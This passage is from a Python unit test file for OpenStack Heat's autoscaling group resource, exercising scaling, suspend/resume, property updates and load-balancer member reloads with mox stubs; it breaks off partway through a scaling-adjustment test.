dummy_instance_id = 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa'
params = {'KeyName': 'test', 'ImageId': 'foo'}
def setUp(self):
    """Point waitconditions at a dummy server URL and stub keystone."""
    super(AutoScalingTest, self).setUp()
    cfg.CONF.set_default('heat_waitcondition_server_url',
                         'http://server.test:8000/v1/waitcondition')
    self.stub_keystoneclient()
def create_scaling_group(self, t, stack, resource_name):
    """Create the LaunchConfig then the named group resource.

    Asserts both reach (CREATE, COMPLETE) and that the
    BlockDeviceMappings from the template survive into both the config
    and the group's instance definition. Returns the group resource.
    """
    # create the launch configuration resource
    conf = stack['LaunchConfig']
    self.assertIsNone(conf.validate())
    scheduler.TaskRunner(conf.create)()
    self.assertEqual((conf.CREATE, conf.COMPLETE), conf.state)
    # check bdm in configuration
    self.assertIsNotNone(conf.properties['BlockDeviceMappings'])
    # create the group resource
    rsrc = stack[resource_name]
    self.assertIsNone(rsrc.validate())
    scheduler.TaskRunner(rsrc.create)()
    self.assertEqual((rsrc.CREATE, rsrc.COMPLETE), rsrc.state)
    # check bdm in instance_definition
    instance_definition = rsrc._get_instance_definition()
    self.assertIn('BlockDeviceMappings',
                  instance_definition['Properties'])
    return rsrc
def create_scaling_policy(self, t, stack, resource_name):
    """Validate and create the named scaling-policy resource; return it."""
    rsrc = stack[resource_name]
    self.assertIsNone(rsrc.validate())
    scheduler.TaskRunner(rsrc.create)()
    self.assertEqual((rsrc.CREATE, rsrc.COMPLETE), rsrc.state)
    return rsrc
def _stub_create(self, num, with_error=None):
    """Record mox expectations for `num` instance creations.

    If `with_error` is given, expect a single handle_create that raises
    Error(with_error) instead. Each successful create is polled once as
    incomplete, then complete any number of times.
    """
    self.m.StubOutWithMock(instance.Instance, 'handle_create')
    self.m.StubOutWithMock(instance.Instance, 'check_create_complete')
    self.stub_ImageConstraint_validate()
    if with_error:
        instance.Instance.handle_create().AndRaise(
            exception.Error(with_error))
        return
    cookie = object()
    for x in range(num):
        instance.Instance.handle_create().AndReturn(cookie)
        instance.Instance.check_create_complete(cookie).AndReturn(False)
    instance.Instance.check_create_complete(
        cookie).MultipleTimes().AndReturn(True)
def _stub_delete(self, num):
    """Record mox expectations for `num` instance deletions.

    Each delete is polled once as incomplete, then complete any number
    of times.
    """
    self.m.StubOutWithMock(instance.Instance, 'handle_delete')
    self.m.StubOutWithMock(instance.Instance, 'check_delete_complete')
    task = object()
    for x in range(num):
        instance.Instance.handle_delete().AndReturn(task)
        instance.Instance.check_delete_complete(task).AndReturn(False)
    instance.Instance.check_delete_complete(
        task).MultipleTimes().AndReturn(True)
def _stub_suspend(self, cookies=None, with_error=None):
    """Record mox expectations for suspending instances.

    One suspend is expected per entry in `cookies` (default: a single
    dummy cookie); order is not enforced (InAnyOrder). If `with_error`
    is given, a single failing handle_suspend is recorded instead.
    """
    # NOTE(review): this `or []` is dead — inst_cookies below re-applies
    # the same fallback, so an empty/None `cookies` ends up as one dummy
    # cookie either way.
    cookies = cookies or []
    self.m.StubOutWithMock(instance.Instance, 'handle_suspend')
    self.m.StubOutWithMock(instance.Instance, 'check_suspend_complete')
    if with_error:
        instance.Instance.handle_suspend().AndRaise(
            exception.Error(with_error))
        return
    inst_cookies = cookies or [(object(), object(), object())]
    for cookie in inst_cookies:
        instance.Instance.handle_suspend().InAnyOrder().AndReturn(cookie)
        instance.Instance.check_suspend_complete(
            cookie).InAnyOrder().AndReturn(False)
        instance.Instance.check_suspend_complete(
            cookie).InAnyOrder().AndReturn(True)
def _stub_resume(self, cookies=None, with_error=None):
    """Record mox expectations for resuming instances.

    Mirror of _stub_suspend: one resume per cookie (default one dummy
    cookie), unordered; or a single failing handle_resume when
    `with_error` is given.
    """
    # NOTE(review): dead fallback — see the matching note in _stub_suspend.
    cookies = cookies or []
    self.m.StubOutWithMock(instance.Instance, 'handle_resume')
    self.m.StubOutWithMock(instance.Instance, 'check_resume_complete')
    if with_error:
        instance.Instance.handle_resume().AndRaise(
            exception.Error(with_error))
        return
    inst_cookies = cookies or [(object(), object(), object())]
    for cookie in inst_cookies:
        instance.Instance.handle_resume().InAnyOrder().AndReturn(cookie)
        instance.Instance.check_resume_complete(
            cookie).InAnyOrder().AndReturn(False)
        instance.Instance.check_resume_complete(
            cookie).InAnyOrder().AndReturn(True)
def _stub_lb_reload(self, num, unset=True, nochange=False):
    """Expect the load balancer to be updated with `num` instance ids.

    With `unset`, verifies and clears existing stubs first so a fresh
    record/replay cycle can start. With `nochange`, no LB update is
    expected (group size did not change).
    """
    expected_list = [self.dummy_instance_id] * num
    if unset:
        self.m.VerifyAll()
        self.m.UnsetStubs()
    if num > 0:
        # Every instance reports the same dummy id.
        self.m.StubOutWithMock(instance.Instance, 'FnGetRefId')
        instance.Instance.FnGetRefId().MultipleTimes().AndReturn(
            self.dummy_instance_id)
    if not nochange:
        self.m.StubOutWithMock(loadbalancer.LoadBalancer, 'handle_update')
        loadbalancer.LoadBalancer.handle_update(
            mox.IgnoreArg(), mox.IgnoreArg(),
            {'Instances': expected_list}).AndReturn(None)
def _stub_scale_notification(self,
                             adjust,
                             groupname,
                             start_capacity,
                             adjust_type='ChangeInCapacity',
                             end_capacity=None,
                             with_error=None):
    """Expect the start/end (or start/error) notification pair for one
    scaling operation on `groupname`."""
    self.m.StubOutWithMock(notification, 'send')
    # A 'start' notification always precedes the adjustment.
    notification.send(stack=mox.IgnoreArg(),
                      adjustment=adjust,
                      adjustment_type=adjust_type,
                      capacity=start_capacity,
                      groupname=mox.IgnoreArg(),
                      suffix='start',
                      message="Start resizing the group %s"
                      % groupname,
                      ).AndReturn(False)
    if with_error:
        # Failed adjustment: expect an 'error' notification carrying the
        # nested-stack failure message.
        notification.send(stack=mox.IgnoreArg(),
                          adjustment=adjust,
                          capacity=start_capacity,
                          adjustment_type=adjust_type,
                          groupname=mox.IgnoreArg(),
                          message='Nested stack update failed:'
                                  ' Error: %s' % with_error,
                          suffix='error',
                          ).AndReturn(False)
    else:
        # Successful adjustment: expect an 'end' notification with the
        # final capacity.
        notification.send(stack=mox.IgnoreArg(),
                          adjustment=adjust,
                          adjustment_type=adjust_type,
                          capacity=end_capacity,
                          groupname=mox.IgnoreArg(),
                          message="End resizing the group %s"
                          % groupname,
                          suffix='end',
                          ).AndReturn(False)
def _stub_meta_expected(self, now, data=None, nsignal=1):
    """Freeze time at `now` and expect the metadata writes of a scaling
    operation: `nsignal` scaling_in_progress=True writes, then the
    cooldown/scaling_in_progress=False write(s)."""
    # Stop time at now
    timeutils.set_time_override(now)
    self.addCleanup(timeutils.clear_time_override)
    # Then set a stub to ensure the metadata updates are as expected.
    self.m.StubOutWithMock(resource.Resource, 'metadata_set')
    # Set scaling_in_progress=True at the beginning of a scaling operation.
    # This does not happen on create.
    init_expected = mox.ContainsKeyValue('scaling_in_progress', True)
    # Note for ScalingPolicy, we expect to get a metadata
    # update for the policy and autoscaling group, so pass nsignal=2 in
    # that case
    for x in range(nsignal):
        resource.Resource.metadata_set(init_expected).AndReturn(None)
    # Set scaling_in_progress=False and the cooldown timestamp at the end
    # of a scaling operation. This occurs on both create and scale events.
    if data is None:
        cooldown = mox.IgnoreArg()
    else:
        cooldown = {now.isoformat(): data}
    expected = {'cooldown': cooldown,
                'scaling_in_progress': False}
    # Note for ScalingPolicy, we expect to get a metadata
    # update for the policy and autoscaling group, so pass nsignal=2
    # Creating an autoscaling group also performs a metadata write, so
    # expect 1 write when nsignal=0
    for x in range(nsignal or 1):
        resource.Resource.metadata_set(expected).AndReturn(None)
def test_scaling_delete_empty(self):
    """A group with min/max/desired all 0 creates no instances and can
    be deleted; InstanceList is None when empty."""
    t = template_format.parse(as_template)
    properties = t['Resources']['WebServerGroup']['Properties']
    properties['MinSize'] = '0'
    properties['MaxSize'] = '0'
    properties['DesiredCapacity'] = '0'
    stack = utils.parse_stack(t, params=self.params)
    self._stub_lb_reload(0)
    self.stub_ImageConstraint_validate()
    self.m.ReplayAll()
    rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
    self.assertIsNone(rsrc.FnGetAtt("InstanceList"))
    rsrc.delete()
    self.m.VerifyAll()
def test_scaling_adjust_down_empty(self):
    """Lowering MinSize to 0 alone does not remove instances; a
    subsequent adjust(-1) scales the group down to empty."""
    t = template_format.parse(as_template)
    properties = t['Resources']['WebServerGroup']['Properties']
    properties['MinSize'] = '1'
    properties['MaxSize'] = '1'
    stack = utils.parse_stack(t, params=self.params)
    self._stub_lb_reload(1)
    now = timeutils.utcnow()
    self._stub_meta_expected(now, 'ExactCapacity : 1', 0)
    self._stub_create(1)
    self.m.ReplayAll()
    rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
    instance_names = rsrc.get_instance_names()
    self.assertEqual(1, len(instance_names))
    # Reduce the min size to 0, should complete without adjusting
    self.m.VerifyAll()
    self.m.UnsetStubs()
    self._stub_meta_expected(now)
    self.m.ReplayAll()
    props = copy.copy(rsrc.properties.data)
    props['MinSize'] = '0'
    update_snippet = rsrc_defn.ResourceDefinition(rsrc.name,
                                                  rsrc.type(),
                                                  props)
    scheduler.TaskRunner(rsrc.update, update_snippet)()
    self.assertEqual(instance_names, rsrc.get_instance_names())
    # trigger adjustment to reduce to 0, there should be no more instances
    self._stub_lb_reload(0)
    self._stub_scale_notification(adjust=-1, groupname=rsrc.FnGetRefId(),
                                  start_capacity=1, end_capacity=0)
    self._stub_meta_expected(now, 'ChangeInCapacity : -1')
    self._stub_delete(1)
    self.m.ReplayAll()
    rsrc.adjust(-1)
    self.assertEqual([], rsrc.get_instance_names())
    rsrc.delete()
    self.m.VerifyAll()
def test_scaling_group_update_replace(self):
    """Changing AvailabilityZones cannot be handled in place and must
    raise UpdateReplace."""
    t = template_format.parse(as_template)
    stack = utils.parse_stack(t, params=self.params)
    self._stub_lb_reload(1)
    now = timeutils.utcnow()
    self._stub_meta_expected(now, 'ExactCapacity : 1', 0)
    self._stub_create(1)
    self.m.ReplayAll()
    rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
    self.assertEqual(utils.PhysName(stack.name, rsrc.name),
                     rsrc.FnGetRefId())
    self.assertEqual(1, len(rsrc.get_instance_names()))
    props = copy.copy(rsrc.properties.data)
    props['AvailabilityZones'] = ['foo']
    update_snippet = rsrc_defn.ResourceDefinition(rsrc.name,
                                                  rsrc.type(),
                                                  props)
    updater = scheduler.TaskRunner(rsrc.update, update_snippet)
    self.assertRaises(resource.UpdateReplace, updater)
    rsrc.delete()
    self.m.VerifyAll()
def test_scaling_group_suspend(self):
    """Suspending a one-instance group reaches (SUSPEND, COMPLETE)."""
    t = template_format.parse(as_template)
    stack = utils.parse_stack(t, params=self.params)
    self._stub_lb_reload(1)
    now = timeutils.utcnow()
    self._stub_meta_expected(now, 'ExactCapacity : 1', 0)
    self._stub_create(1)
    self.m.ReplayAll()
    rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
    self.assertEqual(utils.PhysName(stack.name, rsrc.name),
                     rsrc.FnGetRefId())
    self.assertEqual(1, len(rsrc.get_instance_names()))
    self.assertEqual((rsrc.CREATE, rsrc.COMPLETE), rsrc.state)
    self.m.VerifyAll()
    self.m.UnsetStubs()
    self._stub_suspend()
    self.m.ReplayAll()
    scheduler.TaskRunner(rsrc.suspend)()
    self.assertEqual((rsrc.SUSPEND, rsrc.COMPLETE), rsrc.state)
    rsrc.delete()
    self.m.VerifyAll()
def test_scaling_group_resume(self):
    """Resuming a suspended one-instance group reaches
    (RESUME, COMPLETE)."""
    t = template_format.parse(as_template)
    stack = utils.parse_stack(t, params=self.params)
    self._stub_lb_reload(1)
    now = timeutils.utcnow()
    self._stub_meta_expected(now, 'ExactCapacity : 1', 0)
    self._stub_create(1)
    self.m.ReplayAll()
    rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
    self.assertEqual(utils.PhysName(stack.name, rsrc.name),
                     rsrc.FnGetRefId())
    self.assertEqual(1, len(rsrc.get_instance_names()))
    self.assertEqual((rsrc.CREATE, rsrc.COMPLETE), rsrc.state)
    self.m.VerifyAll()
    self.m.UnsetStubs()
    self._stub_resume()
    self.m.ReplayAll()
    # Mark the group and its nested instances suspended before resuming.
    rsrc.state_set(rsrc.SUSPEND, rsrc.COMPLETE)
    for i in rsrc.nested().values():
        i.state_set(rsrc.SUSPEND, rsrc.COMPLETE)
    scheduler.TaskRunner(rsrc.resume)()
    self.assertEqual((rsrc.RESUME, rsrc.COMPLETE), rsrc.state)
    rsrc.delete()
    self.m.VerifyAll()
def test_scaling_group_suspend_multiple(self):
    """Suspending a two-instance group suspends both instances."""
    t = template_format.parse(as_template)
    properties = t['Resources']['WebServerGroup']['Properties']
    properties['DesiredCapacity'] = '2'
    stack = utils.parse_stack(t, params=self.params)
    self._stub_lb_reload(2)
    now = timeutils.utcnow()
    self._stub_meta_expected(now, 'ExactCapacity : 2', 0)
    self._stub_create(2)
    self.m.ReplayAll()
    rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
    self.assertEqual(utils.PhysName(stack.name, rsrc.name),
                     rsrc.FnGetRefId())
    self.assertEqual(2, len(rsrc.get_instance_names()))
    self.assertEqual((rsrc.CREATE, rsrc.COMPLETE), rsrc.state)
    self.m.VerifyAll()
    self.m.UnsetStubs()
    # Two cookies -> expect two suspend cycles, in any order.
    self._stub_suspend(cookies=[('foo1', 'foo2', 'foo3'),
                                ('bar1', 'bar2', 'bar3')])
    self.m.ReplayAll()
    scheduler.TaskRunner(rsrc.suspend)()
    self.assertEqual((rsrc.SUSPEND, rsrc.COMPLETE), rsrc.state)
    rsrc.delete()
    self.m.VerifyAll()
def test_scaling_group_resume_multiple(self):
    """Resuming a suspended two-instance group resumes both instances."""
    t = template_format.parse(as_template)
    properties = t['Resources']['WebServerGroup']['Properties']
    properties['DesiredCapacity'] = '2'
    stack = utils.parse_stack(t, params=self.params)
    self._stub_lb_reload(2)
    now = timeutils.utcnow()
    self._stub_meta_expected(now, 'ExactCapacity : 2', 0)
    self._stub_create(2)
    self.m.ReplayAll()
    rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
    self.assertEqual(utils.PhysName(stack.name, rsrc.name),
                     rsrc.FnGetRefId())
    self.assertEqual(2, len(rsrc.get_instance_names()))
    self.assertEqual((rsrc.CREATE, rsrc.COMPLETE), rsrc.state)
    self.m.VerifyAll()
    self.m.UnsetStubs()
    # Two cookies -> expect two resume cycles, in any order.
    self._stub_resume(cookies=[('foo1', 'foo2', 'foo3'),
                               ('bar1', 'bar2', 'bar3')])
    self.m.ReplayAll()
    # Mark the group and its nested instances suspended before resuming.
    rsrc.state_set(rsrc.SUSPEND, rsrc.COMPLETE)
    for i in rsrc.nested().values():
        i.state_set(rsrc.SUSPEND, rsrc.COMPLETE)
    scheduler.TaskRunner(rsrc.resume)()
    self.assertEqual((rsrc.RESUME, rsrc.COMPLETE), rsrc.state)
    rsrc.delete()
    self.m.VerifyAll()
def test_scaling_group_suspend_fail(self):
    """A failing instance suspend puts the group in (SUSPEND, FAILED)
    with the error in status_reason."""
    t = template_format.parse(as_template)
    stack = utils.parse_stack(t, params=self.params)
    self._stub_lb_reload(1)
    now = timeutils.utcnow()
    self._stub_meta_expected(now, 'ExactCapacity : 1', 0)
    self._stub_create(1)
    self.m.ReplayAll()
    rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
    self.assertEqual(utils.PhysName(stack.name, rsrc.name),
                     rsrc.FnGetRefId())
    self.assertEqual(1, len(rsrc.get_instance_names()))
    self.assertEqual((rsrc.CREATE, rsrc.COMPLETE), rsrc.state)
    self.m.VerifyAll()
    self.m.UnsetStubs()
    self._stub_suspend(with_error='oops')
    self.m.ReplayAll()
    sus_task = scheduler.TaskRunner(rsrc.suspend)
    self.assertRaises(exception.ResourceFailure, sus_task, ())
    self.assertEqual((rsrc.SUSPEND, rsrc.FAILED), rsrc.state)
    self.assertEqual('Error: Resource SUSPEND failed: Error: oops',
                     rsrc.status_reason)
    rsrc.delete()
    self.m.VerifyAll()
def test_scaling_group_resume_fail(self):
    """A failing instance resume puts the group in (RESUME, FAILED)
    with the error in status_reason."""
    t = template_format.parse(as_template)
    stack = utils.parse_stack(t, params=self.params)
    self._stub_lb_reload(1)
    now = timeutils.utcnow()
    self._stub_meta_expected(now, 'ExactCapacity : 1', 0)
    self._stub_create(1)
    self.m.ReplayAll()
    rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
    self.assertEqual(utils.PhysName(stack.name, rsrc.name),
                     rsrc.FnGetRefId())
    self.assertEqual(1, len(rsrc.get_instance_names()))
    self.assertEqual((rsrc.CREATE, rsrc.COMPLETE), rsrc.state)
    self.m.VerifyAll()
    self.m.UnsetStubs()
    self._stub_resume(with_error='oops')
    self.m.ReplayAll()
    # Mark the group and its nested instances suspended before resuming.
    rsrc.state_set(rsrc.SUSPEND, rsrc.COMPLETE)
    for i in rsrc.nested().values():
        i.state_set(rsrc.SUSPEND, rsrc.COMPLETE)
    sus_task = scheduler.TaskRunner(rsrc.resume)
    self.assertRaises(exception.ResourceFailure, sus_task, ())
    self.assertEqual((rsrc.RESUME, rsrc.FAILED), rsrc.state)
    self.assertEqual('Error: Resource RESUME failed: Error: oops',
                     rsrc.status_reason)
    rsrc.delete()
    self.m.VerifyAll()
def test_scaling_group_create_error(self):
    """An instance-create exception leaves the group in (CREATE, FAILED)
    with no instances."""
    t = template_format.parse(as_template)
    stack = utils.parse_stack(t, params=self.params)
    self.m.StubOutWithMock(instance.Instance, 'handle_create')
    self.m.StubOutWithMock(instance.Instance, 'check_create_complete')
    instance.Instance.handle_create().AndRaise(Exception)
    self.stub_ImageConstraint_validate()
    self.m.ReplayAll()
    conf = stack['LaunchConfig']
    self.assertIsNone(conf.validate())
    scheduler.TaskRunner(conf.create)()
    self.assertEqual((conf.CREATE, conf.COMPLETE), conf.state)
    rsrc = stack['WebServerGroup']
    self.assertIsNone(rsrc.validate())
    self.assertRaises(exception.ResourceFailure,
                      scheduler.TaskRunner(rsrc.create))
    self.assertEqual((rsrc.CREATE, rsrc.FAILED), rsrc.state)
    self.assertEqual([], rsrc.get_instance_names())
    self.m.VerifyAll()
def test_scaling_group_update_ok_maxsize(self):
    """Lowering MaxSize below current capacity is accepted without
    changing the running instances."""
    t = template_format.parse(as_template)
    properties = t['Resources']['WebServerGroup']['Properties']
    properties['MinSize'] = '1'
    properties['MaxSize'] = '3'
    stack = utils.parse_stack(t, params=self.params)
    self._stub_lb_reload(1)
    now = timeutils.utcnow()
    self._stub_meta_expected(now, 'ExactCapacity : 1', 0)
    self._stub_create(1)
    self.m.ReplayAll()
    rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
    self.assertEqual(1, len(rsrc.get_instance_names()))
    instance_names = rsrc.get_instance_names()
    self.m.VerifyAll()
    self.m.UnsetStubs()
    # Reduce the max size to 2, should complete without adjusting
    self._stub_meta_expected(now)
    self.m.ReplayAll()
    props = copy.copy(rsrc.properties.data)
    props['MaxSize'] = '2'
    update_snippet = rsrc_defn.ResourceDefinition(rsrc.name,
                                                  rsrc.type(),
                                                  props)
    scheduler.TaskRunner(rsrc.update, update_snippet)()
    self.assertEqual(instance_names, rsrc.get_instance_names())
    self.assertEqual(2, rsrc.properties['MaxSize'])
    rsrc.delete()
    self.m.VerifyAll()
    def test_scaling_group_update_ok_minsize(self):
        """Raising MinSize above current capacity grows the group."""
        t = template_format.parse(as_template)
        properties = t['Resources']['WebServerGroup']['Properties']
        properties['MinSize'] = '1'
        properties['MaxSize'] = '3'
        stack = utils.parse_stack(t, params=self.params)
        self._stub_lb_reload(1)
        now = timeutils.utcnow()
        self._stub_meta_expected(now, 'ExactCapacity : 1', 0)
        self._stub_create(1)
        self.m.ReplayAll()
        rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
        self.assertEqual(1, len(rsrc.get_instance_names()))
        # Increase min size to 2, should trigger an ExactCapacity adjust
        self._stub_lb_reload(2)
        self._stub_meta_expected(now, 'ExactCapacity : 1')
        self._stub_create(1)
        self.m.ReplayAll()
        props = copy.copy(rsrc.properties.data)
        props['MinSize'] = '2'
        update_snippet = rsrc_defn.ResourceDefinition(rsrc.name,
                                                      rsrc.type(),
                                                      props)
        scheduler.TaskRunner(rsrc.update, update_snippet)()
        self.assertEqual(2, len(rsrc.get_instance_names()))
        self.assertEqual(2, rsrc.properties['MinSize'])
        rsrc.delete()
        self.m.VerifyAll()
    def test_scaling_group_update_ok_desired(self):
        """Raising DesiredCapacity on update grows the group to match."""
        t = template_format.parse(as_template)
        properties = t['Resources']['WebServerGroup']['Properties']
        properties['MinSize'] = '1'
        properties['MaxSize'] = '3'
        stack = utils.parse_stack(t, params=self.params)
        self._stub_lb_reload(1)
        now = timeutils.utcnow()
        self._stub_meta_expected(now, 'ExactCapacity : 1', 0)
        self._stub_create(1)
        self.m.ReplayAll()
        rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
        self.assertEqual(1, len(rsrc.get_instance_names()))
        # Increase min size to 2 via DesiredCapacity, should adjust
        self._stub_lb_reload(2)
        self._stub_meta_expected(now, 'ExactCapacity : 2')
        self._stub_create(1)
        self.m.ReplayAll()
        props = copy.copy(rsrc.properties.data)
        props['DesiredCapacity'] = '2'
        update_snippet = rsrc_defn.ResourceDefinition(rsrc.name,
                                                      rsrc.type(),
                                                      props)
        scheduler.TaskRunner(rsrc.update, update_snippet)()
        self.assertEqual(2, len(rsrc.get_instance_names()))
        self.assertEqual(2, rsrc.properties['DesiredCapacity'])
        rsrc.delete()
        self.m.VerifyAll()
    def test_scaling_group_update_ok_desired_zero(self):
        """Setting MinSize/DesiredCapacity to zero deletes all instances."""
        t = template_format.parse(as_template)
        properties = t['Resources']['WebServerGroup']['Properties']
        properties['MinSize'] = '1'
        properties['MaxSize'] = '3'
        stack = utils.parse_stack(t, params=self.params)
        self._stub_lb_reload(1)
        now = timeutils.utcnow()
        self._stub_meta_expected(now, 'ExactCapacity : 1', 0)
        self._stub_create(1)
        self.m.ReplayAll()
        rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
        self.assertEqual(1, len(rsrc.get_instance_names()))
        # Reduce to zero via MinSize/DesiredCapacity; the single
        # instance should be deleted.
        self._stub_lb_reload(0)
        self._stub_meta_expected(now, 'ExactCapacity : 0')
        self._stub_delete(1)
        self.m.ReplayAll()
        props = copy.copy(rsrc.properties.data)
        props['MinSize'] = '0'
        props['DesiredCapacity'] = '0'
        update_snippet = rsrc_defn.ResourceDefinition(rsrc.name,
                                                      rsrc.type(),
                                                      props)
        scheduler.TaskRunner(rsrc.update, update_snippet)()
        self.assertEqual(0, len(rsrc.get_instance_names()))
        self.assertEqual(0, rsrc.properties['DesiredCapacity'])
        rsrc.delete()
        self.m.VerifyAll()
    def test_scaling_group_update_ok_desired_remove(self):
        """Removing the optional DesiredCapacity on update is a no-op."""
        t = template_format.parse(as_template)
        properties = t['Resources']['WebServerGroup']['Properties']
        properties['DesiredCapacity'] = '2'
        stack = utils.parse_stack(t, params=self.params)
        self._stub_lb_reload(2)
        now = timeutils.utcnow()
        self._stub_meta_expected(now, 'ExactCapacity : 2', 0)
        self._stub_create(2)
        self.m.ReplayAll()
        rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
        self.assertEqual(2, len(rsrc.get_instance_names()))
        instance_names = rsrc.get_instance_names()
        self.m.VerifyAll()
        self.m.UnsetStubs()
        # Remove DesiredCapacity from the updated template, which should
        # have no effect, it's an optional parameter
        self._stub_meta_expected(now)
        self.m.ReplayAll()
        props = copy.copy(rsrc.properties.data)
        del props['DesiredCapacity']
        update_snippet = rsrc_defn.ResourceDefinition(rsrc.name,
                                                      rsrc.type(),
                                                      props)
        scheduler.TaskRunner(rsrc.update, update_snippet)()
        # Group membership unchanged; the property now reads as None.
        self.assertEqual(instance_names, rsrc.get_instance_names())
        self.assertIsNone(rsrc.properties['DesiredCapacity'])
        rsrc.delete()
        self.m.VerifyAll()
    def test_scaling_group_update_ok_cooldown(self):
        """Updating Cooldown changes the property without resizing."""
        t = template_format.parse(as_template)
        properties = t['Resources']['WebServerGroup']['Properties']
        properties['Cooldown'] = '60'
        stack = utils.parse_stack(t, params=self.params)
        self._stub_lb_reload(1)
        now = timeutils.utcnow()
        self._stub_meta_expected(now, 'ExactCapacity : 1', 0)
        self._stub_create(1)
        self.m.ReplayAll()
        rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
        self.assertEqual(utils.PhysName(stack.name, rsrc.name),
                         rsrc.FnGetRefId())
        self.assertEqual(1, len(rsrc.get_instance_names()))
        props = copy.copy(rsrc.properties.data)
        props['Cooldown'] = '61'
        update_snippet = rsrc_defn.ResourceDefinition(rsrc.name,
                                                      rsrc.type(),
                                                      props)
        scheduler.TaskRunner(rsrc.update, update_snippet)()
        # Property is coerced from the string '61' to the integer 61.
        self.assertEqual(61, rsrc.properties['Cooldown'])
        rsrc.delete()
        self.m.VerifyAll()
    def test_lb_reload_static_resolve(self):
        """LB reload passes a fully-resolved template to handle_update.

        Fn::GetAZs in the load balancer definition must be resolved to
        the stack's availability zones before the AWS LB is updated with
        the group's member instances.
        """
        t = template_format.parse(as_template)
        properties = t['Resources']['ElasticLoadBalancer']['Properties']
        properties['AvailabilityZones'] = {'Fn::GetAZs': ''}
        self.m.StubOutWithMock(parser.Stack, 'get_availability_zones')
        parser.Stack.get_availability_zones().MultipleTimes().AndReturn(
            ['abc', 'xyz'])
        # Check that the Fn::GetAZs is correctly resolved
        expected = {u'Type': u'AWS::ElasticLoadBalancing::LoadBalancer',
                    u'Properties': {'Instances': ['aaaabbbbcccc'],
                                    u'Listeners': [{u'InstancePort': u'80',
                                                    u'LoadBalancerPort': u'80',
                                                    u'Protocol': u'HTTP'}],
                                    u'AvailabilityZones': ['abc', 'xyz']}}
        # Pin the generated instance id so 'Instances' above matches.
        self.m.StubOutWithMock(short_id, 'generate_id')
        short_id.generate_id().AndReturn('aaaabbbbcccc')
        now = timeutils.utcnow()
        self._stub_meta_expected(now, 'ExactCapacity : 1', 0)
        self._stub_create(1)
        self.m.ReplayAll()
        stack = utils.parse_stack(t, params=self.params)
        lb = stack['ElasticLoadBalancer']
        self.m.StubOutWithMock(lb, 'handle_update')
        lb.handle_update(expected,
                         mox.IgnoreArg(),
                         mox.IgnoreArg()).AndReturn(None)
        self.m.ReplayAll()
        rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
        self.assertEqual(utils.PhysName(stack.name, rsrc.name),
                         rsrc.FnGetRefId())
        self.assertEqual(1, len(rsrc.get_instance_names()))
        props = copy.copy(rsrc.properties.data)
        props['Cooldown'] = '61'
        update_snippet = rsrc_defn.ResourceDefinition(rsrc.name,
                                                      rsrc.type(),
                                                      props)
        scheduler.TaskRunner(rsrc.update, update_snippet)()
        rsrc.delete()
        self.m.VerifyAll()
    def test_lb_reload_members(self):
        """A Neutron LB gets its 'members' list updated on group create."""
        t = template_format.parse(as_template)
        # Swap the AWS LB for a Neutron one in the template.
        t['Resources']['ElasticLoadBalancer'] = {
            'Type': 'OS::Neutron::LoadBalancer',
            'Properties': {
                'protocol_port': 8080,
                'pool_id': 'pool123'
            }
        }
        expected = {
            'Type': 'OS::Neutron::LoadBalancer',
            'Properties': {
                'protocol_port': 8080,
                'pool_id': 'pool123',
                'members': [u'aaaabbbbcccc']}
        }
        # Pin the generated instance id so 'members' above matches.
        self.m.StubOutWithMock(short_id, 'generate_id')
        short_id.generate_id().AndReturn('aaaabbbbcccc')
        self.m.StubOutWithMock(neutron_lb.LoadBalancer, 'handle_update')
        neutron_lb.LoadBalancer.handle_update(expected,
                                              mox.IgnoreArg(),
                                              mox.IgnoreArg()).AndReturn(None)
        now = timeutils.utcnow()
        self._stub_meta_expected(now, 'ExactCapacity : 1', 0)
        self._stub_create(1)
        self.m.ReplayAll()
        stack = utils.parse_stack(t, params=self.params)
        self.create_scaling_group(t, stack, 'WebServerGroup')
        self.m.VerifyAll()
    def test_lb_reload_invalid_resource(self):
        """A non-LB resource named in LoadBalancerNames fails the create."""
        t = template_format.parse(as_template)
        # Replace the LB with a volume, which cannot take members.
        t['Resources']['ElasticLoadBalancer'] = {
            'Type': 'AWS::EC2::Volume',
            'Properties': {
                'AvailabilityZone': 'nova'
            }
        }
        self._stub_create(1)
        self.m.ReplayAll()
        stack = utils.parse_stack(t, params=self.params)
        error = self.assertRaises(
            exception.ResourceFailure,
            self.create_scaling_group, t, stack, 'WebServerGroup')
        self.assertEqual(
            "Error: Unsupported resource 'ElasticLoadBalancer' in "
            "LoadBalancerNames",
            six.text_type(error))
        self.m.VerifyAll()
    def test_scaling_group_adjust(self):
        """adjust() supports relative and exact capacity changes.

        Walks the group 3 -> 1 (ChangeInCapacity -2) -> 3
        (ChangeInCapacity +2) -> 2 (ExactCapacity), checking the
        instance count and scale notifications at each step.
        """
        t = template_format.parse(as_template)
        stack = utils.parse_stack(t, params=self.params)
        # start with 3
        properties = t['Resources']['WebServerGroup']['Properties']
        properties['DesiredCapacity'] = '3'
        self._stub_lb_reload(3)
        now = timeutils.utcnow()
        self._stub_meta_expected(now, 'ExactCapacity : 3', 0)
        self._stub_create(3)
        self.m.ReplayAll()
        rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
        self.assertEqual(3, len(rsrc.get_instance_names()))
        # reduce to 1
        self._stub_lb_reload(1)
        self._stub_delete(2)
        self.stub_ImageConstraint_validate(num=1)
        self._stub_meta_expected(now, 'ChangeInCapacity : -2')
        self._stub_scale_notification(adjust=-2, groupname=rsrc.FnGetRefId(),
                                      start_capacity=3, end_capacity=1)
        self.m.ReplayAll()
        rsrc.adjust(-2)
        self.assertEqual(1, len(rsrc.get_instance_names()))
        # raise to 3
        self._stub_lb_reload(3)
